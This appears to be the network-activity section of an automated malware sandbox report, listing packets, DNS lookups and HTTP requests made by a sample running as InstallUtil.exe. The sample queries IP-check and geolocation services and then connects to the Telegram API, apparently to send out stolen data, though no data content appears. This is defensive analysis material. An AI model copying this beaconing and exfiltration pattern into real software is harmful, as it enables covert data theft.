                                                                                                                                                              Jan 8, 2025 16:33:10.111994982 CET4982180192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:10.523819923 CET44349836188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:10.525259018 CET49836443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:10.525278091 CET44349836188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:10.683288097 CET44349836188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:10.683351994 CET44349836188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:10.683496952 CET49836443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:10.684163094 CET49836443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:10.687520981 CET4982180192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:10.688711882 CET4984180192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:10.692450047 CET8049821132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:10.692620039 CET4982180192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:10.693470955 CET8049841132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:10.693572998 CET4984180192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:10.693666935 CET4984180192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:10.698412895 CET8049841132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:11.486530066 CET8049841132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:11.487879038 CET49847443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:11.487909079 CET44349847188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:11.488028049 CET49847443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:11.488281012 CET49847443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:11.488292933 CET44349847188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:11.537491083 CET4984180192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:12.088023901 CET44349847188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:12.089840889 CET49847443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:12.089867115 CET44349847188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:12.231367111 CET44349847188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:12.231429100 CET44349847188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:12.231489897 CET49847443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:12.231995106 CET49847443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:12.237262011 CET4985380192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:12.242084980 CET8049853132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:12.242161989 CET4985380192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:12.242264032 CET4985380192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:12.247066975 CET8049853132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:13.042296886 CET8049853132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:13.043539047 CET49859443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:13.043574095 CET44349859188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:13.043629885 CET49859443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:13.043889999 CET49859443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:13.043905973 CET44349859188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:13.084407091 CET4985380192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:13.522797108 CET44349859188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:13.524523973 CET49859443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:13.524547100 CET44349859188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:13.651992083 CET44349859188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:13.652060986 CET44349859188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:13.652169943 CET49859443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:13.652590036 CET49859443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:13.655731916 CET4985380192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:13.656764030 CET4986380192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:13.660665989 CET8049853132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:13.661570072 CET8049863132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:13.661746979 CET4985380192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:13.661780119 CET4986380192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:13.661869049 CET4986380192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:13.666593075 CET8049863132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:14.477482080 CET8049863132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:14.479029894 CET49869443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:14.479074955 CET44349869188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:14.479134083 CET49869443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:14.479398012 CET49869443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:14.479408979 CET44349869188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:14.521862984 CET4986380192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:15.005306005 CET44349869188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:15.007201910 CET49869443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:15.007225990 CET44349869188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:15.157234907 CET44349869188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:15.157299042 CET44349869188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:15.157587051 CET49869443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:15.157875061 CET49869443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:15.161279917 CET4986380192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:15.162470102 CET4987480192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:15.166263103 CET8049863132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:15.166321993 CET4986380192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:15.167258024 CET8049874132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:15.167334080 CET4987480192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:15.167418003 CET4987480192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:15.172147036 CET8049874132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:15.970668077 CET8049874132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:15.972712994 CET49880443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:15.972764015 CET44349880188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:15.972868919 CET49880443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:15.973401070 CET49880443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:15.973428965 CET44349880188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:16.021925926 CET4987480192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:16.443481922 CET44349880188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:16.445400000 CET49880443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:16.445425034 CET44349880188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:16.596282005 CET44349880188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:16.596348047 CET44349880188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:16.596412897 CET49880443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:16.596875906 CET49880443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:16.603815079 CET4987480192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:16.604456902 CET4988680192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:16.610398054 CET8049874132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:16.610543013 CET4987480192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:16.610851049 CET8049886132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:16.610929966 CET4988680192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:16.611049891 CET4988680192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:16.617454052 CET8049886132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:17.398276091 CET8049886132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:17.400063038 CET49892443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:17.400087118 CET44349892188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:17.400255919 CET49892443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:17.407385111 CET49892443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:17.407397985 CET44349892188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:17.443761110 CET4988680192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:17.922718048 CET44349892188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:17.924806118 CET49892443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:17.924832106 CET44349892188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:18.079444885 CET44349892188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:18.079519033 CET44349892188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:18.079601049 CET49892443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:18.080121040 CET49892443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:18.101367950 CET4988680192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:18.102816105 CET4989780192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:18.106251001 CET8049886132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:18.106323004 CET4988680192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:18.107636929 CET8049897132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:18.107701063 CET4989780192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:18.107815027 CET4989780192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:18.112612009 CET8049897132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:18.891547918 CET8049897132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:18.892997026 CET49904443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:18.893024921 CET44349904188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:18.893085003 CET49904443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:18.893393993 CET49904443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:18.893403053 CET44349904188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:18.944190025 CET4989780192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:19.360199928 CET44349904188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:19.361964941 CET49904443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:19.361979008 CET44349904188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:19.531297922 CET44349904188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:19.531403065 CET44349904188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:19.531614065 CET49904443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:19.531972885 CET49904443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:19.535188913 CET4989780192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:19.535948038 CET4990880192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:19.540108919 CET8049897132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:19.540188074 CET4989780192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:19.540756941 CET8049908132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:19.541451931 CET4990880192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:19.541558027 CET4990880192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:19.546262980 CET8049908132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:20.356795073 CET8049908132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:20.358244896 CET49915443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:20.358306885 CET44349915188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:20.358448029 CET49915443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:20.358763933 CET49915443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:20.358768940 CET44349915188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:20.412499905 CET4990880192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:20.850533962 CET44349915188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:20.852149963 CET49915443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:20.852174997 CET44349915188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:20.998884916 CET44349915188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:20.998945951 CET44349915188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:20.998990059 CET49915443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:20.999420881 CET49915443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:21.012372017 CET4990880192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:21.017306089 CET8049908132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:21.017359018 CET4990880192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:21.020495892 CET49920443192.168.2.4149.154.167.220
                                                                                                                                                              Jan 8, 2025 16:33:21.020519972 CET44349920149.154.167.220192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:21.020579100 CET49920443192.168.2.4149.154.167.220
                                                                                                                                                              Jan 8, 2025 16:33:21.020951033 CET49920443192.168.2.4149.154.167.220
                                                                                                                                                              Jan 8, 2025 16:33:21.020963907 CET44349920149.154.167.220192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:21.672909021 CET44349920149.154.167.220192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:21.673007011 CET49920443192.168.2.4149.154.167.220
                                                                                                                                                              Jan 8, 2025 16:33:21.677673101 CET49920443192.168.2.4149.154.167.220
                                                                                                                                                              Jan 8, 2025 16:33:21.677689075 CET44349920149.154.167.220192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:21.677964926 CET44349920149.154.167.220192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:21.683248043 CET49920443192.168.2.4149.154.167.220
                                                                                                                                                              Jan 8, 2025 16:33:21.727322102 CET44349920149.154.167.220192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:21.949568987 CET44349920149.154.167.220192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:21.949626923 CET44349920149.154.167.220192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:21.950229883 CET49920443192.168.2.4149.154.167.220
                                                                                                                                                              Jan 8, 2025 16:33:21.955327034 CET49920443192.168.2.4149.154.167.220
                                                                                                                                                              Jan 8, 2025 16:33:38.015902042 CET4984180192.168.2.4132.226.8.169

                                                                                                                                                              UDP Packets

                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                              Jan 8, 2025 16:33:07.809209108 CET6240353192.168.2.41.1.1.1
                                                                                                                                                              Jan 8, 2025 16:33:07.816123009 CET53624031.1.1.1192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:08.942646027 CET6173553192.168.2.41.1.1.1
                                                                                                                                                              Jan 8, 2025 16:33:08.951699018 CET53617351.1.1.1192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:21.013015985 CET6465553192.168.2.41.1.1.1
                                                                                                                                                              Jan 8, 2025 16:33:21.019942999 CET53646551.1.1.1192.168.2.4

                                                                                                                                                              DNS Queries

                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                              Jan 8, 2025 16:33:07.809209108 CET192.168.2.41.1.1.10x87edStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                                              Jan 8, 2025 16:33:08.942646027 CET192.168.2.41.1.1.10x61d8Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                                              Jan 8, 2025 16:33:21.013015985 CET192.168.2.41.1.1.10x7b62Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                                                                              DNS Answers

                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                              Jan 8, 2025 16:33:07.816123009 CET1.1.1.1192.168.2.40x87edNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                              Jan 8, 2025 16:33:07.816123009 CET1.1.1.1192.168.2.40x87edNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                                              Jan 8, 2025 16:33:07.816123009 CET1.1.1.1192.168.2.40x87edNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                                              Jan 8, 2025 16:33:07.816123009 CET1.1.1.1192.168.2.40x87edNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                                              Jan 8, 2025 16:33:07.816123009 CET1.1.1.1192.168.2.40x87edNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                                              Jan 8, 2025 16:33:07.816123009 CET1.1.1.1192.168.2.40x87edNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                                              Jan 8, 2025 16:33:08.951699018 CET1.1.1.1192.168.2.40x61d8No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                              Jan 8, 2025 16:33:08.951699018 CET1.1.1.1192.168.2.40x61d8No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                              Jan 8, 2025 16:33:21.019942999 CET1.1.1.1192.168.2.40x7b62No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                              • reallyfreegeoip.org
                                                                                                                                                              • api.telegram.org
                                                                                                                                                              • checkip.dyndns.org

                                                                                                                                                              HTTP Packets

                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              0192.168.2.449821132.226.8.169807492C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Jan 8, 2025 16:33:07.827218056 CET151OUTGET / HTTP/1.1
                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                              Host: checkip.dyndns.org
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Jan 8, 2025 16:33:08.627363920 CET273INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 08 Jan 2025 15:33:08 GMT
                                                                                                                                                              Content-Type: text/html
                                                                                                                                                              Content-Length: 104
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                              Jan 8, 2025 16:33:08.630911112 CET127OUTGET / HTTP/1.1
                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                              Host: checkip.dyndns.org
                                                                                                                                                              Jan 8, 2025 16:33:08.905949116 CET273INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 08 Jan 2025 15:33:08 GMT
                                                                                                                                                              Content-Type: text/html
                                                                                                                                                              Content-Length: 104
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                              Jan 8, 2025 16:33:09.791059971 CET127OUTGET / HTTP/1.1
                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                              Host: checkip.dyndns.org
                                                                                                                                                              Jan 8, 2025 16:33:10.063947916 CET273INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 08 Jan 2025 15:33:09 GMT
                                                                                                                                                              Content-Type: text/html
                                                                                                                                                              Content-Length: 104
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              1192.168.2.449841132.226.8.169807492C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Jan 8, 2025 16:33:10.693666935 CET127OUTGET / HTTP/1.1
                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                              Host: checkip.dyndns.org
                                                                                                                                                              Jan 8, 2025 16:33:11.486530066 CET273INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 08 Jan 2025 15:33:11 GMT
                                                                                                                                                              Content-Type: text/html
                                                                                                                                                              Content-Length: 104
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              2192.168.2.449853132.226.8.169807492C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Jan 8, 2025 16:33:12.242264032 CET151OUTGET / HTTP/1.1
                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                              Host: checkip.dyndns.org
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Jan 8, 2025 16:33:13.042296886 CET273INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 08 Jan 2025 15:33:12 GMT
                                                                                                                                                              Content-Type: text/html
                                                                                                                                                              Content-Length: 104
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              3192.168.2.449863132.226.8.169807492C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Jan 8, 2025 16:33:13.661869049 CET151OUTGET / HTTP/1.1
                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                              Host: checkip.dyndns.org
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Jan 8, 2025 16:33:14.477482080 CET273INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 08 Jan 2025 15:33:14 GMT
                                                                                                                                                              Content-Type: text/html
                                                                                                                                                              Content-Length: 104
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
